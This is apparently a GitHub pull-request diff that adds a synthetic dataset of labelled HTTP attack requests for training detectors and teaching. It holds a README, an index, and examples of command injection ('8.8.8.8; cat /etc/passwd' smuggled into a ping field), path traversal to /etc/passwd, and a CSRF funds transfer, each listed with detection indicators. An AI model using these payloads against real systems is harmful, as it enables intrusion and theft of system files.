Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
213 changes: 212 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1 +1,212 @@
# synthetic-security-dataset
# Synthetic Security Dataset

A comprehensive dataset of HTTP request and response examples demonstrating various types of malicious attacks. This dataset is designed for security research, training machine learning models for threat detection, and educational purposes.

## Overview

This repository contains synthetic examples of common web application security attacks, organized by attack category. Each example includes:

- Complete HTTP request details (method, URL, headers, body)
- Corresponding HTTP response
- Attack vector description
- Malicious payload
- Detection indicators

## Dataset Structure

```
dataset/
├── schema.json # JSON schema defining the data structure
├── sql-injection/ # SQL injection attack examples
├── xss/ # Cross-Site Scripting (XSS) examples
├── csrf/ # Cross-Site Request Forgery examples
├── path-traversal/ # Directory/path traversal examples
├── command-injection/ # OS command injection examples
└── xxe/ # XML External Entity (XXE) examples
```

## Attack Categories

### 1. SQL Injection
SQL injection attacks attempt to manipulate database queries by inserting malicious SQL code into input fields.

**Examples:**
- Authentication bypass
- UNION-based data extraction
- Blind SQL injection

### 2. Cross-Site Scripting (XSS)
XSS attacks inject malicious scripts into web pages viewed by other users.

**Examples:**
- Reflected XSS via URL parameters
- Stored XSS via user-generated content
- DOM-based XSS

### 3. Cross-Site Request Forgery (CSRF)
CSRF attacks trick users into executing unwanted actions on web applications where they're authenticated.

**Examples:**
- State-changing requests without CSRF tokens
- Malicious form auto-submission

### 4. Path Traversal
Path traversal attacks access files and directories outside the intended directory structure.

**Examples:**
- Reading system files using dot-dot-slash sequences
- Accessing sensitive configuration files

### 5. Command Injection
Command injection attacks execute arbitrary operating system commands on the server.

**Examples:**
- Command chaining using semicolons
- Piping commands
- Command substitution

### 6. XML External Entity (XXE)
XXE attacks exploit XML parsers that process external entity references.

**Examples:**
- Local file disclosure
- Server-side request forgery (SSRF)
- Denial of service

## Data Format

Each attack example is stored as a JSON file following this structure:

```json
{
"id": "unique-identifier",
"category": "Attack Category",
"description": "Description of the attack scenario",
"severity": "critical|high|medium|low",
"request": {
"method": "HTTP_METHOD",
"url": "/path?params",
"headers": {},
"body": "request body or null"
},
"response": {
"status": 200,
"headers": {},
"body": "response body"
},
"attack_vector": "Explanation of how the attack works",
"payload": "The actual malicious payload",
"indicators": ["indicator1", "indicator2"]
}
```

See `dataset/schema.json` for the complete JSON schema definition.

## Usage

### Loading the Dataset

#### Python
```python
import json
import os
from pathlib import Path

def load_dataset(dataset_path='dataset'):
examples = []
for category_dir in Path(dataset_path).iterdir():
if category_dir.is_dir():
for example_file in category_dir.glob('*.json'):
try:
with open(example_file, 'r') as f:
examples.append(json.load(f))
except json.JSONDecodeError as e:
print(f"Error parsing {example_file}: {e}")
return examples

# Load all examples
dataset = load_dataset()
print(f"Loaded {len(dataset)} attack examples")
```

#### JavaScript/Node.js
```javascript
const fs = require('fs');
const path = require('path');

function loadDataset(datasetPath = 'dataset') {
const examples = [];
const categories = fs.readdirSync(datasetPath);

categories.forEach(category => {
const categoryPath = path.join(datasetPath, category);
if (fs.statSync(categoryPath).isDirectory()) {
const files = fs.readdirSync(categoryPath);
files.forEach(file => {
if (file.endsWith('.json')) {
try {
const data = JSON.parse(
fs.readFileSync(path.join(categoryPath, file), 'utf8')
);
examples.push(data);
} catch (error) {
console.error(`Error parsing ${file}:`, error.message);
}
}
});
}
});

return examples;
}

// Load all examples
const dataset = loadDataset();
console.log(`Loaded ${dataset.length} attack examples`);
```

### Filtering by Category

```python
# Get all SQL injection examples
sql_injections = [ex for ex in dataset if ex['category'] == 'SQL Injection']

# Get all critical severity attacks
critical_attacks = [ex for ex in dataset if ex['severity'] == 'critical']
```

## Use Cases

1. **Security Training**: Educational resource for learning about common web vulnerabilities
2. **Machine Learning**: Training data for developing attack detection models
3. **Testing Security Tools**: Benchmark dataset for evaluating WAF, IDS/IPS systems
4. **Security Research**: Reference examples for studying attack patterns
5. **CTF Challenges**: Base material for capture-the-flag security exercises

## Contributing

Contributions are welcome! To add new attack examples:

1. Follow the JSON schema defined in `dataset/schema.json`
2. Place the example in the appropriate category directory
3. Use descriptive IDs and clear descriptions
4. Include realistic HTTP headers and responses
5. Provide clear indicators for detection

## Important Notes

⚠️ **Warning**: This dataset contains examples of malicious attacks. Use only for:
- Educational purposes
- Security research
- Controlled testing environments
- Training security systems

**DO NOT** use these examples to attack real systems. Unauthorized access to computer systems is illegal.

## License

This dataset is provided for educational and research purposes. Please use responsibly and ethically.

## Disclaimer

The examples in this dataset are synthetic and created for educational purposes. They should only be used in controlled environments with proper authorization. The maintainers are not responsible for any misuse of this information.
29 changes: 29 additions & 0 deletions dataset/command-injection/example-1.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
{
"id": "command-injection-001",
"category": "Command Injection",
"description": "OS command injection through ping utility",
"severity": "critical",
"request": {
"method": "POST",
"url": "/network-tools/ping",
"headers": {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
},
"body": "{\"host\": \"8.8.8.8; cat /etc/passwd\"}"
},
"response": {
"status": 200,
"headers": {
"Content-Type": "text/plain"
},
"body": "PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=64 time=0.045 ms\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
},
"attack_vector": "Command injection using semicolon to chain commands",
"payload": "8.8.8.8; cat /etc/passwd",
"indicators": [
"Command separators (;, &&, ||)",
"System commands in user input",
"Unexpected command output in response"
]
}
31 changes: 31 additions & 0 deletions dataset/csrf/example-1.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
{
"id": "csrf-001",
"category": "Cross-Site Request Forgery (CSRF)",
"description": "CSRF attack to transfer funds without user consent",
"severity": "high",
"request": {
"method": "POST",
"url": "/transfer",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"Referer": "http://attacker.com/malicious.html",
"Cookie": "session=victim_session_token"
},
"body": "to_account=attacker_account&amount=1000&currency=USD"
},
"response": {
"status": 200,
"headers": {
"Content-Type": "application/json"
},
"body": "{\"status\": \"success\", \"message\": \"Transfer completed\", \"transaction_id\": \"txn_987654\"}"
},
"attack_vector": "CSRF attack initiated from external malicious site",
"payload": "Malicious HTML form auto-submitting to transfer endpoint",
"indicators": [
"Missing or invalid CSRF token",
"Referer from external domain",
"Unexpected state-changing request"
]
}
72 changes: 72 additions & 0 deletions dataset/index.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,72 @@
{
"dataset_version": "1.0.0",
"created_date": "2025-10-28",
"description": "Synthetic HTTP request/response dataset for malicious attack examples",
"total_examples": 8,
"categories": {
"SQL Injection": {
"count": 2,
"severity_distribution": {
"critical": 2
},
"examples": [
"dataset/sql-injection/example-1.json",
"dataset/sql-injection/example-2.json"
]
},
"Cross-Site Scripting (XSS)": {
"count": 2,
"severity_distribution": {
"high": 2
},
"examples": [
"dataset/xss/example-1.json",
"dataset/xss/example-2.json"
]
},
"Cross-Site Request Forgery (CSRF)": {
"count": 1,
"severity_distribution": {
"high": 1
},
"examples": [
"dataset/csrf/example-1.json"
]
},
"Path Traversal": {
"count": 1,
"severity_distribution": {
"critical": 1
},
"examples": [
"dataset/path-traversal/example-1.json"
]
},
"Command Injection": {
"count": 1,
"severity_distribution": {
"critical": 1
},
"examples": [
"dataset/command-injection/example-1.json"
]
},
"XML External Entity (XXE)": {
"count": 1,
"severity_distribution": {
"critical": 1
},
"examples": [
"dataset/xxe/example-1.json"
]
}
},
"severity_overview": {
"critical": 5,
"high": 3,
"medium": 0,
"low": 0
},
"schema_version": "1.0.0",
"schema_location": "dataset/schema.json"
}
30 changes: 30 additions & 0 deletions dataset/path-traversal/example-1.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
{
"id": "path-traversal-001",
"category": "Path Traversal",
"description": "Directory traversal attack to access sensitive files",
"severity": "critical",
"request": {
"method": "GET",
"url": "/download?file=../../../../etc/passwd",
"headers": {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
"Accept": "*/*"
},
"body": null
},
"response": {
"status": 200,
"headers": {
"Content-Type": "text/plain",
"Content-Disposition": "attachment; filename=passwd"
},
"body": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin"
},
"attack_vector": "Path traversal using dot-dot-slash sequences",
"payload": "../../../../etc/passwd",
"indicators": [
"Dot-dot-slash sequences (../)",
"Access to system files",
"Path manipulation in file parameter"
]
}
Loading